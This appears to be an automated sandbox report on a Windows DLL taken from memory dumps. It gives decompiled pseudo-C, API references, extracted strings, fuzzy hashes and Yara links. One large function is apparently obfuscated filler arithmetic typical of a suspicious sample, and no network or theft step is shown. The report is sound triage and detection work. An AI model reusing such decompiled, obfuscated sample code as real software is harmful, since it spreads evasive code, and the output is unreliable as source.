					__eflags = _t333;
					 *0x6e2859d8 = _t333;
				} else {
					_t333 =  *0x6e2859d8;
					_t156 =  *0x6e2859dc;
					 *0x6e285a90 = _t272 - _t333 * 0x3d -  *0x6e285a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6E1C4401(_t260, E6E1C4401(_t260, E6E1C1FF2(_t260, E6E1C20D9(_t260, E6E1C4267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6e288150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6e285a00;
				_t277 = 0x6e285a0e;
				_t362 =  *0x6e2859dc;
				_t383 =  *0x6e2859d8;
				do {
					if(_t336 != ( *0x6e2859e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t245 = _t336 + 5 + _t383;
						 *0x6e285a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6e2859e2);
				_push("cd Matter m");
				 *0x6e2859d8 = _t383;
				 *0x6e2859dc = _t362; // executed
				E6E20179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				if( *0x6e285a98 != _t164 ||  *0x6e285a9c != 0) {
					 *0x6e2859d8 =  *0x6e2859d8 - 0x27 +  *0x6e2859d0 * 0x3d;
					asm("sbb [0x6e2859dc], ecx");
				} else {
					 *0x6e2859d0 =  *0x6e2859d8 + 0x11e05;
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6e285a90 =  *0x6e285a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6E1C4197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E1C1E10(_t169);
				_t281 = 0x27;
				_t171 = E6E1C0EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6e2859d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6e2859dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6E1C5DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6E1C4197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E1C1E10(_t174);
				 *(_t400 - 0x18) =  *0x6e2859d8 * 0x36 +  *0x6e285a90;
				_t286 =  *0x6e285a90 * 0x10e1d;
				_t178 =  *0x6e2859d8;
				_t287 = 0x6e285a28;
				 *0x6e2859d8 = _t178 * _t286;
				 *0x6e2859dc =  *0x6e2859dc * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 =  *0x6e285a90 + _t386 +  *0x6e2859d0 + 0x3b;
				do {
					if( *0x6e285a28 != 0x27 ||  *0x6e285a2c != 0) {
						_t183 =  *_t287 * _t342;
						 *0x6e2859dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6e2859d8 = _t184;
						if(_t184 !=  *0x6e285a50 || 0 !=  *0x6e285a54) {
							goto L40;
						}
					} else {
						goto L40;
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < 0x6e285ba0);
				_t185 = E6E1C0D32();
				_t364 =  *0x6e285a90;
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t188 =  *0x6e2859d8;
				_t190 =  *0x6e2859f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6e2859e6;
				 *(_t400 - 0x14) =  *0x6e2859dc * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6e2859e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6e2859e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6E1E01E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6e285a90 = _t364;
						if(_t364 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6e285a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				if( *0x6e285a98 != _t197 ||  *0x6e285a9c != 0) {
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t296 =  *(_t400 - 0x10);
					_t83 = _t296 + 0x11e05; // 0x11e05
					_t201 = _t83;
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6e2859e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6e285a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6e285a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6e2859d8 = _t297;
				 *0x6e2859dc = _t346;
				do {
					if(_t393 != ( *0x6e2859e2 & 0x0000ffff)) {
						_t364 = _t393 + 5 + _t297;
						_push(0);
						 *0x6e285a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t297 = _t297 + _t393 + 0x3b + _t364;
						asm("adc edx, eax");
						 *0x6e2859d8 = _t297;
						 *0x6e2859dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6e2859e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6e2859e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6e2859e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6e285a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6e2859e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6e285a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6e2859d0 = _t105 + _t347;
				_t213 = E6E1C1029(_t394);
				_t300 =  *0x6e285a90;
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6e285a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6e2859f2 =  *0x6e2859f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6e2859d0 = _t371;
				if( *0x6e285a04 != 0x1b47) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6e2859e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6e2859d8 = _t349;
					 *0x6e2859dc =  *(_t400 - 0x14);
					_t371 =  *0x6e2859d0;
				}
				_t395 = 0x6e285a0e;
				do {
					if(_t300 != ( *0x6e2859e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6e2859e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6e2859d0 = _t371;
				if( *0x6e285a02 != _t301) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6e2859d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6e285a90 = _t117 + _t349 * 2;
				E6E1BFB4A(_t396, _t451);
				_t350 =  *0x6e285a00;
				_t303 = 0x6e285ac8;
				_t372 =  *0x6e2859d8;
				do {
					if(_t396 !=  *0x6e285a18 || 0 !=  *0x6e285a1c) {
						_t120 = _t396 + 5; // 0x5
						 *0x6e2859dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6e2859d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6e285a00 = _t350;
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6e285a18);
				_t456 = 0 -  *0x6e2859dc;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6e285a58 =  *0x6e285a58 - _t396;
					asm("sbb [0x6e285a5c], eax");
					 *0x6e285a00 = _t354;
					asm("sbb ecx, [0x6e2859dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6e2859d8 = _t372;
					asm("adc ecx, eax");
					 *0x6e2859dc = 0;
				}
				 *0x6e2859d0 =  *0x6e2859d0 + 0x3d + _t372 +  *0x6e285a90 * 2;
				return E6E1E0075(1);
			}

0x6e1c1285
0x6e1c128c
0x6e1c12a2
0x6e1c12aa
0x6e1c12b2
0x6e1c12b8
0x6e1c12ba
0x6e1c12c0
0x6e1c12c3
0x6e1c12c5
0x6e1c12c8
0x6e1c12cb
0x6e1c12d6
0x6e1c12da
0x6e1c12e0
0x6e1c12ec
0x6e1c12f2
0x6e1c12f9
0x6e1c12ff
0x6e1c1302
0x6e1c1308
0x6e1c130e
0x6e1c1310
0x6e1c1310
0x6e1c131d
0x6e1c1320
0x6e1c1325
0x6e1c1328
0x6e1c132b
0x6e1c132e
0x00000000
0x6e1c1330
0x6e1c1334
0x6e1c1338
0x6e1c133d
0x6e1c133f
0x6e1c134b
0x6e1c134d
0x6e1c1353
0x6e1c1359
0x6e1c1361
0x6e1c1363
0x00000000
0x6e1c1363
0x6e1c1361
0x00000000
0x6e1c1366
0x6e1c1366
0x6e1c1369
0x6e1c136c
0x6e1c1375
0x6e1c137e
0x6e1c1397
0x6e1c1397
0x6e1c1399
0x6e1c139f
0x6e1c13a2
0x6e1c13a4
0x6e1c1388
0x6e1c1388
0x6e1c1388
0x6e1c13bf
0x6e1c13c5
0x6e1c13cb
0x6e1c13d1
0x6e1c13d9
0x6e1c13e1
0x6e1c13e6
0x6e1c13eb
0x6e1c13f2
0x6e1c13f8
0x6e1c13fb
0x6e1c1401
0x6e1c1403
0x00000000
0x6e1c1405
0x6e1c140b
0x6e1c1414
0x6e1c1419
0x6e1c141b
0x6e1c1421
0x6e1c1424
0x6e1c1426
0x6e1c1432
0x6e1c143a
0x6e1c143c
0x6e1c1442
0x00000000
0x6e1c1442
0x6e1c143a
0x00000000
0x6e1c1449
0x6e1c1449
0x6e1c144c
0x6e1c1463
0x6e1c1468
0x6e1c147a
0x6e1c1489
0x6e1c148b
0x6e1c1491
0x6e1c14a3
0x6e1c14a9
0x6e1c14a9
0x6e1c14b7
0x6e1c14bc
0x6e1c14bf
0x6e1c14c4
0x6e1c14c6
0x6e1c14cb
0x6e1c14d0
0x6e1c14d2
0x6e1c14d5
0x6e1c14d8
0x6e1c14df
0x6e1c14e4
0x6e1c14e7
0x6e1c14ec
0x6e1c14f2
0x6e1c14f9
0x6e1c1501
0x6e1c1526
0x6e1c1526
0x6e1c152c
0x6e1c1503
0x6e1c1514
0x6e1c1514
0x6e1c1531
0x6e1c1536
0x6e1c153b
0x6e1c1544
0x6e1c1545
0x6e1c154b
0x6e1c1551
0x6e1c1558
0x6e1c157e
0x6e1c1586
0x6e1c158b
0x6e1c158b
0x6e1c158d
0x6e1c155a
0x6e1c155a
0x6e1c1565
0x6e1c1570
0x6e1c1570
0x6e1c1593
0x6e1c1594
0x6e1c1595
0x6e1c15bc
0x6e1c15c1
0x6e1c15c7
0x6e1c15cc
0x6e1c15d2
0x6e1c15d8
0x6e1c15e1
0x6e1c15e3
0x6e1c15e9
0x6e1c15eb
0x6e1c15f5
0x6e1c15f7
0x6e1c15fa
0x6e1c15fa
0x6e1c15fc
0x6e1c15ff
0x6e1c1607
0x6e1c160c
0x6e1c1612
0x6e1c1618
0x6e1c1620
0x6e1c1629
0x6e1c164e
0x6e1c1654
0x6e1c1633
0x6e1c163d
0x6e1c163d
0x6e1c1664
0x6e1c1667
0x6e1c166a
0x6e1c166f
0x6e1c1671
0x6e1c1674
0x6e1c167b
0x6e1c167e
0x6e1c1683
0x6e1c168a
0x6e1c168f
0x6e1c1695
0x6e1c169c
0x6e1c169d
0x6e1c16a2
0x6e1c16a5
0x6e1c16aa
0x6e1c16ac
0x6e1c16b6
0x6e1c16bb
0x6e1c16bd
0x6e1c16c0
0x6e1c16c3
0x6e1c16c8
0x6e1c16cd
0x6e1c16d4
0x6e1c16d9
0x6e1c16df
0x6e1c16f6
0x6e1c16f9
0x6e1c1707
0x6e1c170e
0x6e1c1715
0x6e1c1725
0x6e1c172e
0x6e1c1733
0x6e1c1737
0x6e1c173e
0x6e1c174a
0x6e1c174d
0x6e1c1753
0x6e1c1755
0x6e1c1758
0x6e1c1763
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c176d
0x6e1c176d
0x6e1c1770
0x6e1c177a
0x6e1c177f
0x6e1c1785
0x6e1c178d
0x6e1c1790
0x6e1c1793
0x6e1c17a2
0x6e1c17ad
0x6e1c17b4
0x6e1c17b7
0x6e1c17c3
0x6e1c17c6
0x6e1c17cc
0x6e1c17e9
0x6e1c17f0
0x6e1c17f0
0x6e1c17f3
0x6e1c17f6
0x6e1c17f8
0x6e1c17ce
0x6e1c17d1
0x6e1c17d9
0x6e1c17e4
0x6e1c17e4
0x6e1c17fe
0x6e1c1801
0x6e1c1806
0x6e1c1809
0x6e1c180c
0x6e1c180f
0x6e1c1812
0x6e1c1878
0x00000000
0x6e1c1814
0x6e1c181b
0x6e1c181f
0x6e1c1824
0x6e1c1827
0x6e1c1830
0x6e1c1836
0x6e1c1838
0x6e1c1840
0x6e1c1842
0x00000000
0x6e1c1842
0x6e1c1840
0x00000000
0x6e1c1845
0x6e1c1845
0x6e1c1848
0x6e1c184b
0x6e1c1854
0x6e1c1855
0x6e1c1858
0x6e1c1861
0x6e1c1884
0x6e1c1889
0x6e1c1889
0x6e1c188c
0x6e1c188e
0x6e1c186d
0x6e1c186d
0x6e1c1870
0x6e1c1870
0x6e1c1870
0x6e1c1891
0x6e1c1897
0x6e1c18b1
0x6e1c1899
0x6e1c1899
0x6e1c18a5
0x6e1c18a7
0x6e1c18ad
0x6e1c18ad
0x6e1c18b6
0x6e1c18c2
0x6e1c18c5
0x6e1c18c7
0x6e1c18ca
0x6e1c18cc
0x6e1c18d2
0x6e1c18d8
0x6e1c18e1
0x6e1c18e9
0x6e1c18eb
0x6e1c18ed
0x6e1c18f3
0x6e1c18fb
0x6e1c18fe
0x6e1c1900
0x6e1c1906
0x6e1c1906
0x6e1c190f
0x6e1c1912
0x6e1c1915
0x6e1c191c
0x6e1c191f
0x6e1c1924
0x6e1c1927
0x6e1c192e
0x6e1c1931
0x6e1c1931
0x6e1c1935
0x00000000
0x6e1c1937
0x6e1c1941
0x6e1c1944
0x6e1c1946
0x6e1c1955
0x6e1c1957
0x6e1c195a
0x00000000
0x6e1c195a
0x6e1c1955
0x00000000
0x6e1c1961
0x6e1c1961
0x6e1c1964
0x6e1c1967
0x6e1c196e
0x6e1c1975
0x6e1c197a
0x6e1c197f
0x6e1c1985
0x6e1c1988
0x6e1c198a
0x6e1c198f
0x6e1c1993
0x6e1c1995
0x6e1c1998
0x6e1c199f
0x6e1c199f
0x6e1c19a1
0x6e1c19a9
0x6e1c19ab
0x6e1c19b8
0x6e1c19eb
0x6e1c19ba
0x6e1c19c4
0x6e1c19c9
0x6e1c19d2
0x6e1c19d5
0x6e1c19d7
0x6e1c19dd
0x6e1c19e3
0x6e1c19e3
0x6e1c19ee
0x6e1c19f3
0x6e1c19fc
0x6e1c19fe
0x6e1c1a01
0x6e1c1a04
0x6e1c1a04
0x6e1c1a07
0x6e1c1a0a
0x6e1c1a0a
0x6e1c1a0c
0x6e1c1a0f
0x6e1c1a11
0x6e1c1a19
0x6e1c1a1e
0x6e1c1a1f
0x6e1c1a2c
0x6e1c1a31
0x6e1c1a31
0x6e1c1a33
0x6e1c1a33
0x6e1c1a39
0x6e1c1a41
0x6e1c1a46
0x6e1c1a4b
0x6e1c1a51
0x6e1c1a56
0x6e1c1a5c
0x6e1c1a64
0x6e1c1a6e
0x6e1c1a71
0x6e1c1a76
0x6e1c1a78
0x6e1c1a7a
0x6e1c1a80
0x6e1c1a86
0x6e1c1a89
0x6e1c1a8b
0x6e1c1a8b
0x6e1c1a91
0x6e1c1a94
0x6e1c1aa3
0x6e1c1aa5
0x6e1c1ab0
0x6e1c1ab4
0x6e1c1ab6
0x6e1c1abd
0x6e1c1ac5
0x6e1c1acf
0x6e1c1ad5
0x6e1c1ad7
0x6e1c1add
0x6e1c1adf
0x6e1c1adf
0x6e1c1afc
0x6e1c1b07

APIs

__EH_prolog3.LIBCMT ref: 6E1C128C
GetSystemDirectoryA.KERNEL32 ref: 6E1C13C5
GetTempPathA.KERNEL32(0000056D,6E29C218,?,6E1DFF71,?,00000001,?,?,00000001,?,6E2827E0,0000000C,6E1E006E,?,00000001,?), ref: 6E1C1468

Strings

Y(n, xrefs: 6E1C1801
cd Island, xrefs: 6E1C1531
out drop , xrefs: 6E1C16C8
Had s, xrefs: 6E1C14DF
6265, xrefs: 6E1C14CB
DZ(n, xrefs: 6E1C144C
Y(n, xrefs: 6E1C1915
Y(n, xrefs: 6E1C1320
DZ(n, xrefs: 6E1C184B
cd Matter m, xrefs: 6E1C1607
Y(n, xrefs: 6E1C191F
part , xrefs: 6E1C15B5
(Z(n, xrefs: 6E1C170E
Y(n, xrefs: 6E1C15FF
DZ(n, xrefs: 6E1C1967
6623, xrefs: 6E1C16B1
Y(n, xrefs: 6E1C1A11
DZ(n, xrefs: 6E1C136C
Molecul, xrefs: 6E1C167E
Y(n, xrefs: 6E1C13E1

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DirectoryH_prolog3PathSystemTemp
String ID: (Z(n$6265$6623$DZ(n$DZ(n$DZ(n$DZ(n$Had s$Molecul$cd Island$cd Matter m$out drop $part $Y(n$Y(n$Y(n$Y(n$Y(n$Y(n$Y(n
API String ID: 3607090873-3476223227
Opcode ID: 3b3fc37dd311a5aabd4cad00fbf3fd7f08933477c37cc360b62afee97f1671bd
Instruction ID: 64c9d374caad00a3b3af68ee2a3bfd8116c9bb3edc48348fcc9d77a99d08f916
Opcode Fuzzy Hash: 3b3fc37dd311a5aabd4cad00fbf3fd7f08933477c37cc360b62afee97f1671bd
Instruction Fuzzy Hash: 8D32B171A81A118FCF04CFA8C4995AE77F3BB5B724B65452AD007DB740E734A889CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C78D3, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6E1C78D3(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				intOrPtr* _t19;
				intOrPtr _t21;
				void* _t22;

				E6E1E00AC(0x6e228421, __ebx, __edi, __esi, 0);
				_t19 = __ecx;
				_push(8);
				 *__ecx = 0x6e22aa30;
				_t21 = E6E1DF8B6(__edx, __esi, __eflags);
				if(_t21 == 0) {
					_t21 = 0;
					__eflags = 0;
				} else {
					 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
					_push(1); // executed
					_t11 = E6E1C7005(__ebx, _t19, _t21); // executed
					 *((intOrPtr*)(_t21 + 4)) = _t11;
				}
				 *((intOrPtr*)(_t19 + 0x34)) = _t21;
				E6E1C7F47(_t19);
				return E6E1E0075(_t19);
			}

0x6e1c78da
0x6e1c78df
0x6e1c78e1
0x6e1c78e3
0x6e1c78ee
0x6e1c78f3
0x6e1c7906
0x6e1c7906
0x6e1c78f5
0x6e1c78f5
0x6e1c78f9
0x6e1c78fb
0x6e1c7901
0x6e1c7901
0x6e1c790a
0x6e1c790d
0x6e1c7919

APIs

__EH_prolog3.LIBCMT ref: 6E1C78DA
std::locale::_Init.LIBCPMT ref: 6E1C78FB

Part of subcall function 6E1C7005: __EH_prolog3.LIBCMT ref: 6E1C700C
Part of subcall function 6E1C7005: std::_Lockit::_Lockit.LIBCPMT ref: 6E1C7017
Part of subcall function 6E1C7005: std::locale::_Setgloballocale.LIBCPMT ref: 6E1C7032
Part of subcall function 6E1C7005: _Yarn.LIBCPMT ref: 6E1C7048
Part of subcall function 6E1C7005: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C7088

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 1197184b816d26f722ccae00f0a90165bef939556e04f37a2c5d4770d90f8d83
Instruction ID: ad2a6774963098cc4d8e9ef02b6b89a33c1ac7724ddaffea5f63548127e2b4bf
Opcode Fuzzy Hash: 1197184b816d26f722ccae00f0a90165bef939556e04f37a2c5d4770d90f8d83
Instruction Fuzzy Hash: AEE0DF32E21A255BD31297F48501BACA1666F94F24F62041AE101DFAC0DFE8888067C3

Uniqueness

Uniqueness Score: -1.00%

Function 6E20C7EF, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6E20C7EF(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				void* _t16;
				signed int _t17;
				void* _t19;
				signed int _t20;
				long _t21;

				_t16 = __ecx;
				_t20 = _a4;
				if(_t20 == 0) {
					L2:
					_t21 = _t20 * _a8;
					if(_t21 == 0) {
						_t21 = _t21 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6e287b04, 8, _t21); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6E21BEB2();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6E202281())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6E209256(_t15, _t16, _t17, _t19, __eflags, _t21);
						_pop(_t16);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t17 = _t13 % _t20;
				if(_t13 / _t20 < _a8) {
					goto L8;
				}
				goto L2;
			}

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E20D6B4,00000001,00000364,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9), ref: 6E20C830

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 50623d0307c763c3ecb05b67933da9dbd1d28dfa905ee362c407dbd8fb1d76e4
Instruction ID: b3436d37660d85ec07c514272b6c32f69c21cc9f32174384fde2f7eb2c0ca42b
Opcode Fuzzy Hash: 50623d0307c763c3ecb05b67933da9dbd1d28dfa905ee362c407dbd8fb1d76e4
Instruction Fuzzy Hash: 1CF0BB7154552F5BEB539AD69816A47375F9F82F71B1645219C14AE1C4CB30D800C2F4

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F26D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E20F26D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				long _t11;

				_t8 = __ecx;
				_t11 = _a4;
				if(_t11 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6E202281())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t11 == 0) {
					_t11 = _t11 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6e287b04, 0, _t11); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6E21BEB2();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6E209256(_t7, _t8, _t9, _t10, __eflags, _t11);
					_pop(_t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 78945eb8f71123853590ab6bd4011905647aad285bc9a2ca962dcd76377b9691
Instruction ID: db1c89c45e10d23e5b0023cc8a8724ac2bb0bc9fc8ac7d7920fc89b106feb930
Opcode Fuzzy Hash: 78945eb8f71123853590ab6bd4011905647aad285bc9a2ca962dcd76377b9691
Instruction Fuzzy Hash: C7E0302A18562A9FF75116E69814B8B3B9FAF837B2B2105119C35965C0CB20C801C1A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E21E6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6E21E6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_v8 =  *0x6e28506c ^ _t107;
				_t3 =  &_a12; // 0x6e20e03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6E20D5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6E20D5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6e20e03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6e232f04; // 0x17
					E6E21E68F(0, " )#nU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
